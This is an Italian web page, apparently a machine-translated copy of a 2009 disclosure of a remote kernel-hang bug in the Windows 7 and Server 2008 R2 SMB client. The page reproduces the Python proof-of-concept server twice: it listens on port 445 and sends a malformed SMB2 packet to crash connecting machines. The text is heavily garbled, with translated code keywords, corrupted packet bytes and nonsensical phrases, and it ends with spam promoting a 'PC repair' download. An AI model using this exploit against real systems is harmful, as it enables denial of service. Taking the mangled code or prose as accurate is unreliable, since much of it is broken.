Table of Contents
Approvato
Se Windows 7th / Server 2008r2 Remote Kernel si blocca sul tuo computer, chiunque di noi spera che questa guida per l’utente possa essere di aiuto per risolvere il problema. G.Ciclo infinito del client SMB di Microsoft Windows 7 / Server 2008 R2: impedisce l’esecuzione di operazioni nel client SMB di Microsoft Windows su Windows 7 e Windows Server 2010 R2. Per lo più fallisce il kernel silenzioso. Il Metasploit Framework contiene un modulo particolare per sfruttare la mia vulnerabilità.
G.
#! / usr e bin / python# win7-crash.Trigger py:# crash del kernel rurale sul server host Win7 e 2008R2 (ciclo infinito)# KeAccumulateTicks () si blocca a causa di NT_ASSERT () - DbgRaiseAssertionFailure () causato da potenti# Ciclo infinito.# NO BSOD, DEVI SCOLLEGARE IL CONNETTORE.# Per chiamare rapidamente l'elemento; in ordine: this_script_ip_addr BLAH, crasha senza sforzo# Autore: Laurent Gaffi¯ ¿ ½Importa server socketPacchetto = (" x00 x00 x00 x9a" dimensione del numero ---> deve essere 9th, senza dubbio 9a .." xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00"" x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00""A 0???#A"" xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00"" x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01 ""?Q?b`?? LM ""`+?0sony ericsson xperia x10?"" x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a")Classe SMB2 (SocketServer.BaseRequestHandler): Def-Handle (lei stessa): print "Chi:", self.client_address Usa "GRAZIE SDL" I metodi di immissione self.request.recv (1024) self.request.send (pacchetto) self.request.close ()launch = SocketServer.TCPServer (('', 445), SMB2) # ascolta su tutte le interfacce centro 445launch.serve_forever ()
Questo errore è una prova importante che SDL FAIL
L’obiettivo di un errore è un ciclo infinito sull’argomento di smb1,2, pre-autenticazione, solo nessuna credenziale appropriata…
Può essere lanciato sulla televisione locale tramite (IE *)
L’errore sarà probabilmente così semplice che molti avrebbero dovuto essere scoperti anni fa da un SDL specifico se l’SDL esisteva già:
netbios_header è uguale a struct.pack (“> i”, len (”. work with (SMB_packet)) + SMB_packet
(I tag netbios h2 indicano la lunghezza relativa al nuovo pacchetto smb1,2.)
Se il particolare numero netbios_header è 4 byte molto meno o più di SMB_packet, la questione è semplicemente violata!
CHE TIPO ?? Stai scherzando dov’è anche il mio SDL?!?
“Il sistema operativo ideale sulla luce. е “;
Che il tuo firewall corretto sia sempre stato configurato dovrebbe essere rimosso tramite IE, anche con l’operazione di trasmissione nbns (nessuna interazione dell’utente)
================================================
– Data di uscita: 11 novembre 2009
– Scoperta da: Laurent Gaffier
– Gravità: media/alta
==============================================
NS. CONFERMA DEL CONCETTO
————————–
# win7-crash.py:
# Esecuzione di un nuovo vero crash del kernel remoto in Win7 e quindi Server 2008R2 (loop infinito)
# KeAccumulateTicks () si è bloccato a causa di NT_ASSERT () / DbgRaiseAssertionFailure () a cui ha contribuito # un ciclo infinito forte.
# NESSUN BSOD, HAI UN SUGHERO.
# Per chiamarlo rapidamente; nell’ordine: this_script_ip_addr BLAH, elimina immediatamente
# Inserito da Laurent Gaffier
#
Pacchetto = (numero ” x00 x00 x00 x9a” —> la 9a lunghezza dovrebbe esistere realmente 9a ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 “
” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
“?Q?b`?? LM ”
” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”
” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)
V. IMPATTO COMMERCIALE
————————–
Un utente malintenzionato dovrebbe disabilitare in remoto qualsiasi computer Windows 2008R2 7 /
in locale interact o tramite IE
Vii. Mix di patch
————————–
non è disponibile per un’istanza del genere, al tuo ISP non interessa.
Chiudere la funzione e le porte SMB fino a quando non viene fornito un controllo autentico.
X. STORIA DEI CAMBIAMENTI
————————–
8 novembre 2009: MSRC ha contattato
8 novembre 2009: MSRC ha scoperto una vulnerabilità
11 novembre 2009: MRSC potrebbe essere descritto come un tentativo di convincermi perché c’è un bug IPv6 da una serie di fornitori che non dovrebbe apparire dai bollettini di sicurezza.
11 novembre 2009: questo prezioso bug è stato rilasciato.
XI. NOTE
————————–
Le informazioni legali contenute in questo avviso vengono utilizzate “così come sono”
senza dichiarazioni o garanzie di opportunità o altro.
Non ricevo alcun danno causato dall’azienda o da
Uso improprio di queste informazioni.
Errore del kernel remoto Windows 7 Server 2008R2
Data: gmail mercoledì 11 novembre 2009 05:58:44 room ) 05:00
________________________________________________GenereLa mia divulgazione di informazioni - fidati perfettamente ora.Carta: http://lists.grok.org.uk/full-disclosure-charter.htmlAppena pubblicato e sponsorizzato per gentile concessione di Secunia Http: // secunia-.com/
Per data Per Filo
- Potente arresto anomalo del kernel remoto di Windows Server 2008R2 di Laurent Gaffy (11 novembre)
Approvato
Lo strumento di riparazione ASR Pro è la soluzione per un PC Windows che funziona lentamente, presenta problemi di registro o è infetto da malware. Questo strumento potente e facile da usare può diagnosticare e riparare rapidamente il tuo PC, aumentando le prestazioni, ottimizzando la memoria e migliorando la sicurezza nel processo. Non soffrire più di un computer lento: prova ASR Pro oggi!
Il software per riparare il tuo PC è a portata di clic: scaricalo ora.